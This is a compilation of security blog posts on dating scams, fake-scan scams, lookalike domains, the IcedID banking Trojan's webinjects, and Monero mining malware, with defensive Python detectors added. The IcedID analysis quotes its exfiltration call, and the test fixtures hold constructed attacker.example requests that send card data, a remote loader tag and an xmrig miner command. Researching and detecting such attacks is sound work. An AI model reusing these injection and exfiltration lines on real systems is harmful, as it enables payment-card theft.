Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them later. They will threaten to send any racy photos to your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date, and carry pepper spray or a taser for physical protection. Go the extra step and turn on a friend-finder or location-sharing app that lets your safety friend track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam



Thousands of users have encountered a severe threat from scammers who are making cunning use of JavaScript and HTML code by way of “Potentially Unwanted Applications” (PUAs).

A major security research organization uncovered a recent development in the scam arena in which PUAs and POAs are being employed.

These scams can be categorized as tech-support scams, which work primarily by scaring the victim into doing something they would never do on their own.

After fake calls, potentially unwanted applications have become quite common, but the latest twist is the shrewd use of JavaScript and HTML code.

This code is designed to make the fake scans look convincingly real, making it faster and easier for the scammers to fool their prey.

The branding of the well-known Norton Security applications is essentially being stolen from the aforementioned organization.

These scams are in no way comparable to the basic and obvious antivirus scams that run on a regular basis.

The scammers make the scan look so legitimate that it never occurs to the victim to question it at all.

An alert does pop up. Users take it to be from an anti-malware app, when it is actually coming from the web browser.

The scammers’ approach is to offer to find an infection by way of a 10-second scan, which swiftly lures users in.

The scammers have implemented a web-based dashboard to manage and monitor all the scams in progress.

Thousands of dollars have been wrested from victims, and with overtly basic, fake-looking contrivances at that.

The last three months of 2018 were really busy for Symantec, the aforementioned organization, which blocked PUA installations around 89 million times.

There are several points to keep in mind; for instance, no pop-up is capable of analyzing the hard drive and the real files on it.

No anti-malware application would ask the user to download a separate application for the update process.

The best way to stay safe from this kind of threat is to look out for an alert that mentions the days remaining in the so-called “subscription”.

Lookalike domains: Artificial intelligence may come to the rescue

In the world of network security, hackers often use lookalike domains to lure users to unintended and unwanted websites, to deliver malicious software into, or send data out of, a victim’s network, taking advantage of the fact that it is hard to tell the difference between those domains and the ones they imitate. For example, in a recent card skimming malware attack, the domain google-analyitics.org was used to receive collected payment card data (there is … More
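To make the detection problem concrete, here is an added example that is not part of the Help Net Security article and is not the AI approach it refers to: a small Python checker that folds visually confusable characters and scores each domain label against a brand list by edit distance. The brand list, the confusable map and the test domains are constructed for the example; it generalizes beyond the google-analyitics.org case to digit and Cyrillic homoglyph substitutions and to brand names placed in a subdomain of an unrelated site.

```python
import unicodedata

# Brand domains to protect (constructed allowlist for this example).
PROTECTED_DOMAINS = ["google-analytics.com", "google.com", "paypal.com", "microsoft.com"]

# Characters routinely swapped for their visual twins (a partial, assumed map).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
    "\u0430": "a", "\u043e": "o", "\u0435": "e", "\u0440": "p",  # Cyrillic a, o, e, r
})


def normalize_domain(domain):
    """Lower-case, drop a trailing dot and decode punycode (xn--) labels."""
    domain = domain.strip().lower().rstrip(".")
    try:
        domain = domain.encode("ascii").decode("idna")
    except ValueError:
        pass  # already Unicode (or malformed IDNA); compare it as given
    return domain


def skeleton(label):
    """Fold diacritics and confusable characters so look-alike strings compare equal."""
    label = unicodedata.normalize("NFKD", label)
    label = "".join(ch for ch in label if not unicodedata.combining(ch))
    return label.translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def edit_distance(a, b):
    """Optimal string alignment distance: substitutions, insertions, deletions
    and adjacent transpositions each cost 1 (catches 'analyitics' and 'gogole')."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(domain, max_distance=2):
    """Return (verdict, brand): 'exact' for a protected domain or its subdomains,
    'lookalike' when any label (public suffix excluded) is within max_distance
    edits of a brand name after folding, otherwise 'unrelated'."""
    full = normalize_domain(domain)
    labels = full.split(".")
    best = None
    for brand in PROTECTED_DOMAINS:
        if full == brand or full.endswith("." + brand):
            return ("exact", brand)
        brand_name = skeleton(brand.split(".")[0])
        for label in labels[:-1]:
            dist = edit_distance(skeleton(label), brand_name)
            if dist <= max_distance and (best is None or dist < best[0]):
                best = (dist, brand)
    return ("lookalike", best[1]) if best else ("unrelated", None)


if __name__ == "__main__":
    for candidate in ["google-analyitics.org", "paypa1.com", "p\u0430ypal.com",
                      "microsoft.com.evil.net", "analytics.google.com", "example.org"]:
        print(candidate, "->", classify(candidate))
```

A production deployment would replace the single-label suffix assumption with a public-suffix list and feed the verdicts into DNS or proxy logging rather than printing them, but the folding-plus-distance core is what separates google-analyitics.org from a legitimate subdomain of google.com.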

The post Lookalike domains: Artificial intelligence may come to the rescue appeared first on Help Net Security.

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitated redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates it against the attacker’s web-based control panel (e.g., var pkey = "Ab1cd23"). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) packer function in the communication with the attack server, which revealed the following code. Encoding of this kind is a common strategy to pack code and make it more compact.
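The eval(function(p,a,c,k,e,...) wrapper is the signature of a widely used JavaScript packer: p is the script with each identifier replaced by a base-a token, k is the dictionary of original words, and the decoder substitutes the tokens back. The analysis step described above can be reproduced offline without evaluating the attacker’s JavaScript at all. The following Python unpacker is an added example, not IBM’s tooling and not the actual IcedID payload; the packed SAMPLE is constructed in the packer’s shape (with the pkey value and loader id from the article) so the decoding can be checked.

```python
import re

# Matches the packer's invocation: eval(function(p,a,c,k,e,d){...}('<p>',<a>,<c>,'<k>'.split('|'),...)
PACKED_RE = re.compile(
    r"eval\(function\(p,\s*a,\s*c,\s*k,\s*e,\s*[rd]\)\s*\{.*?\}\s*"
    r"\('(?P<p>(?:[^'\\]|\\.)*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*"
    r"'(?P<k>[^']*)'\.split\('\|'\)",
    re.S,
)


def _encode(index, radix):
    """Reproduce the packer's e(c): base-`radix` digits are 0-9, a-z, then A-Z."""
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    out = ""
    while True:
        out = alphabet[index % radix] + out
        index //= radix
        if index == 0:
            return out


def _unescape(literal):
    """Undo the escapes the packer applies inside the single-quoted p literal
    (assumption: only \\', \\\\ and \\n, \\r, \\t occur)."""
    table = {"n": "\n", "r": "\r", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(1)), literal, flags=re.S)


def unpack(source):
    """Return the decoded script, or None if no packed block is present."""
    m = PACKED_RE.search(source)
    if not m:
        return None
    p = _unescape(m.group("p"))
    radix, count = int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")
    # Walk the dictionary from the highest index down, exactly as the JS decoder does,
    # replacing whole tokens only (\b...\b) so string literals such as "Ab1cd23" survive.
    for index in range(count - 1, -1, -1):
        if index < len(words) and words[index]:
            token = re.escape(_encode(index, radix))
            p = re.sub(r"\b" + token + r"\b", lambda _m, w=words[index]: w, p)
    return p


# Constructed sample in the packer's shape; not the real IcedID script.
SAMPLE = r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 1="Ab1cd23";0 2=3.4("5");2.6="jsess_script_loader";',62,7,'var|pkey|s|document|createElement|script|id'.split('|'),0,{}))"""

if __name__ == "__main__":
    print(unpack(SAMPLE))
```

Because the decoder iterates from the highest index down and anchors every token with word boundaries, a digit inside a string literal is never mistaken for a dictionary token, which is also why the packer itself is lossless.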

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from home_link, passing the ssid= value that identifies the infected user’s device along with the current calendar date.

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.
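The loader element described in the two preceding sections leaves a footprint that a page-integrity check can spot: a script tag whose src points to an origin the page does not normally load from, carries the bot’s ssid= in its query string, and (in this case) reuses a known element id. The following is an added example, not IBM’s or the Trojan’s code: a stdlib-only Python auditor for captured page HTML. The page URL, the allowlisted CDN and the attacker host are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Loader element id seen in the IcedID sample above; extend with other known markers.
KNOWN_LOADER_IDS = {"jsess_script_loader"}


class _ScriptCollector(HTMLParser):
    """Collects the attribute dict of every <script> start tag in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def audit_scripts(html, page_url, allowed_hosts=()):
    """Return [(src, [reasons])] for script elements that do not belong to the page:
    a remote loader from an origin other than the page's (and not allowlisted),
    an http:// script on an https:// page, a bot identifier (ssid=) in the query,
    or an element id that matches a known injection loader."""
    page = urlsplit(page_url)
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.scripts:
        reasons = []
        src = attrs.get("src")
        if attrs.get("id") in KNOWN_LOADER_IDS:
            reasons.append("known loader id")
        if src:
            parts = urlsplit(src)
            host = parts.hostname
            if host and host != page.hostname and host not in allowed_hosts:
                reasons.append("off-origin host " + host)
            if parts.scheme == "http" and page.scheme == "https":
                reasons.append("plain-http script on https page")
            if "ssid" in parse_qs(parts.query):
                reasons.append("bot identifier (ssid) in query")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed page: one same-origin script, one allowlisted CDN script, one inline
# script, and one loader in the shape the article describes (attacker host is made up).
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script id="jsess_script_loader" type="text/javascript"
        src="http://attacker.example/gate.php?ssid=BOT123&d=2019-02-12"></script>
</head><body>
<script>console.log("inline");</script>
<script src="https://cdn.example.net/lib.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_scripts(SAMPLE_PAGE, "https://shop.example.com/login",
                                      allowed_hosts=("cdn.example.net",)):
        print(src, "->", ", ".join(reasons))
```

The same comparison can be run continuously in the browser with a MutationObserver on script insertions, or enforced outright with a Content-Security-Policy script-src allowlist, which blocks the second-stage fetch even when the first-stage injection has already modified the DOM.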

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name: Purpose

  • isFrame(): Checks for frames on the website to look for potential third-party security controls.
  • isValidCardNumber(a): Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.
  • onLoaded(): The main function that sets off the data grabbing process.
  • addLog(a,b,c,d): Adds new logs to the reports section in the attack server.
  • writeLog(): Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + "&pkey=" + urlEncode(pkey) + "&ssid=" + b, b)
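Two entries in the function list above describe network-visible behaviour a defender can turn into detection logic: writeLog() posts to gate_link with pkey= and ssid= in the query, and isValidCardNumber() applies a Luhn check before data is sent, so the card numbers leaving the victim are Luhn-valid. The following is an added example, not part of the IBM analysis: a Python scanner over proxy log lines that flags both. The log format, client addresses, attacker host and card number are constructed (4111 1111 1111 1111 is a standard test number); the pkey value is the one quoted earlier in the article.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed proxy log layout: "<timestamp> <client-ip> <method> <url> <status> <body-or-dash>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) (?P<body>.*)$")
# 13 to 19 digits, optionally separated by spaces or dashes, not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)\d(?:[ -]?\d){12,18}(?!\d)")


def luhn_valid(number):
    """Luhn check-digit test: the same filter the script's isValidCardNumber() is believed
    to use, applied here so random digit runs (order ids, timestamps) do not raise alerts."""
    digits = [int(ch) for ch in number if ch.isdigit()]
    if len(digits) < 13:
        return False
    total = 0
    for position, digit in enumerate(reversed(digits)):
        if position % 2 == 1:          # every second digit from the right is doubled
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    query = parse_qs(url.query)
    reasons = []
    # writeLog() in the decoded script sends gate_link + ... + "&pkey=" + ... + "&ssid=" + ...
    if url.path.endswith("/gate.php") and {"pkey", "ssid"}.issubset(query):
        reasons.append("ATSEngine-style gate request (pkey and ssid present)")
    for candidate in PAN_RE.findall(url.query + " " + m["body"]):
        if luhn_valid(candidate):
            reasons.append("Luhn-valid card number leaving the network")
            break
    if not reasons:
        return None
    return {"ts": m["ts"], "client": m["client"], "host": url.hostname, "reasons": reasons}


def scan(lines):
    """Run analyze_line over a log and keep only the findings."""
    return [finding for finding in map(analyze_line, lines) if finding]


LOG_LINES = [  # constructed sample traffic
    "2019-02-12T10:01:02Z 10.0.0.5 GET https://shop.example.com/account 200 -",
    "2019-02-12T10:01:09Z 10.0.0.5 GET http://attacker.example/gate.php?a=login&pkey=Ab1cd23&ssid=BOT123 200 -",
    "2019-02-12T10:02:31Z 10.0.0.5 POST http://attacker.example/gate.php?a=ccgrab&pkey=Ab1cd23&ssid=BOT123 200 cc=4111111111111111&cvv=123&state=NY",
    "2019-02-12T10:03:00Z 10.0.0.7 POST https://shop.example.com/checkout 200 order=55512&total=19.99",
]

if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["ts"], finding["client"], finding["host"], "; ".join(finding["reasons"]))
```

The gate-pattern rule is specific to this panel and cheap to change on the attacker’s side; the Luhn rule is the durable one, since the data itself cannot be renamed, and it is the check a web proxy or DLP engine should run on outbound bodies to sites that are not the merchant’s own.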

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

Safer Internet Day 2019 – Together for a Better Internet

What You Can Do Today to Help Create a Better Internet

Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

The 4R’s of Online Safety

In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives.

  1. Respect – ‘I treat myself and others the way I like to be treated’

I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

Keyboard warriors who fire off abusive comments online, or harass and troll others clearly do not have any notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications as the dialogue is not just contained to a few, rather it is witnessed by everyone’s online friends which could stretch into the 1000’s. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

  2. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possibly include interactions with the police department.

But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

  3. Reasoning – ‘I question what is real’

Teaching our kids to think critically is an essential survival skill for our kids in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

  4. Resilience – ‘I get back up from tough situations’

Unfortunately, the chances that your child will experience some challenges online are quite high. Whether someone posts a mean comment, they are harassed, or worst case, cyberbullied – these nasty online interactions can really hurt.

Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

In 2014, Parent Zone, one of the UK’s leading family digital safety organisations, collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills, plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

What Can You Do this Safer Internet Day?

Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware

An analysis of more than 4.4 million malware samples showed botnets were responsible for crypto-mining at least 4.3 percent of Monero over a 12-year period.

These illicit efforts generated an estimated $56 million for cybercriminals behind the campaigns. The study from academics in the U.K. and Spain used a combination of both dynamic and static analysis techniques to pull details from the malware campaigns, including an exploration of the mining pools where payments were made as well as cryptocurrency addresses. Over the 12 years, Monero (XMR) was the most popular cryptocurrency targeted by botnets, the study concluded.

New Crypto-Mining Threat Groups Discovered

While the research paper mentioned previously known malware campaigns such as Smominru and Adylkuzz, the study’s authors also noted some new threat actors. These included Freebuf and USA-138, which used general-purpose botnets rather than renting third-party infrastructure to carry out their mining operations.

Though the latter technique tended to be more successful based on the analyses in the study, the findings are a reminder that cybercriminals are highly capable of using legitimate file management tools and code repositories for illicit purposes.

Since mining pools are known to ban suspicious XMR addresses from time to time, and because mining protocols are subject to change, the researchers concluded that some malware authors often modified their code. Some of these campaigns are still active, while others were relatively brief, according to the paper.

In terms of methodology, the researchers said xmrig, an open-source tool, was most commonly used to build the malware strains that powered crypto-mining bots.

Catching Crypto-Mining Before It Happens

Beyond the money it generates for threat actors, crypto-mining, also known as crypto-jacking, has the secondary adverse impact of draining an organization’s central processing unit (CPU) resources.

IBM X-Force research published last year confirmed that crypto-mining has grown significantly over the past few years and needs to become an active part of IT security monitoring. As it becomes a more persistent threat, utilizing security information and event management (SIEM) tools combined with strong endpoint protection is one of the best ways to ensure your technology infrastructure doesn’t become a place for criminals to harvest Monero.
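The article names xmrig as the tool most often used to build these miners and recommends SIEM monitoring; the observable side of that is the process telemetry a miner leaves behind. The following is an added example, not from the study or from IBM: a Python triage function over process-creation events that scores stratum pool URLs, known miner binary names, a Monero wallet address on the command line, the xmrig --donate-level flag and execution from a temp directory. The events, hostnames and wallet address are constructed; the last event is a renamed miner driven by a config file, included to show what this rule alone cannot catch.

```python
import re

# Monero primary and sub-addresses are 95 base58 characters starting with 4 or 8
# (106-character integrated addresses are not matched here).
XMR_ADDRESS_RE = re.compile(
    r"(?<![1-9A-HJ-NP-Za-km-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])")
STRATUM_RE = re.compile(r"\bstratum\+(?:tcp|ssl)://")          # mining pool protocol URL
MINER_NAME_RE = re.compile(r"(?:^|/)(?:xmrig|xmr-stak|minerd|cpuminer)\b")
TEMP_EXEC_RE = re.compile(r"^/(?:var/)?tmp/|^/dev/shm/")


def score_event(event):
    """Score one process-creation event (dict with host, user, cmd) and list the reasons."""
    cmd = event["cmd"]
    checks = [
        (STRATUM_RE.search(cmd), 3, "stratum pool URL"),
        (MINER_NAME_RE.search(cmd), 3, "known miner binary name"),
        (XMR_ADDRESS_RE.search(cmd), 3, "Monero wallet address on command line"),
        ("--donate-level" in cmd, 2, "xmrig --donate-level flag"),
        (TEMP_EXEC_RE.match(cmd), 1, "executable launched from a temp directory"),
    ]
    score, reasons = 0, []
    for hit, weight, label in checks:
        if hit:
            score += weight
            reasons.append(label)
    return {"host": event["host"], "user": event["user"], "score": score, "reasons": reasons}


def triage(events, threshold=3):
    """Return the scored events at or above the alert threshold, highest first."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


# Constructed wallet string in the right shape; not a real address.
FAKE_XMR_ADDRESS = "4" + ("AbcdEfghjkmnpqrstuvwxyz123456789" * 3)[:94]

EVENTS = [  # constructed endpoint telemetry
    {"host": "web-03", "user": "www-data",
     "cmd": "/tmp/.x/xmrig -o stratum+tcp://pool.example.net:3333 -u " + FAKE_XMR_ADDRESS
            + " -p x --donate-level=1 -k"},
    {"host": "build-01", "user": "jenkins",
     "cmd": "/usr/bin/python3 /opt/ci/runner.py --url https://ci.example.com/api"},
    {"host": "db-02", "user": "postgres",
     "cmd": "/usr/lib/postgresql/11/bin/postgres -D /var/lib/postgresql/11/main"},
    {"host": "web-05", "user": "www-data",
     "cmd": "/var/tmp/kworker -c /var/tmp/config.json"},   # renamed miner, settings in a file
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["host"], hit["user"], hit["score"], "; ".join(hit["reasons"]))
```

The web-05 event scores only 1, which is the point: once the binary is renamed and the pool and wallet move into a config file, command-line rules go quiet, and the SIEM needs the complementary signals the article alludes to, sustained CPU utilisation from an unexpected user and outbound connections to pool ports, to close the gap.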

The post Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware appeared first on Security Intelligence.

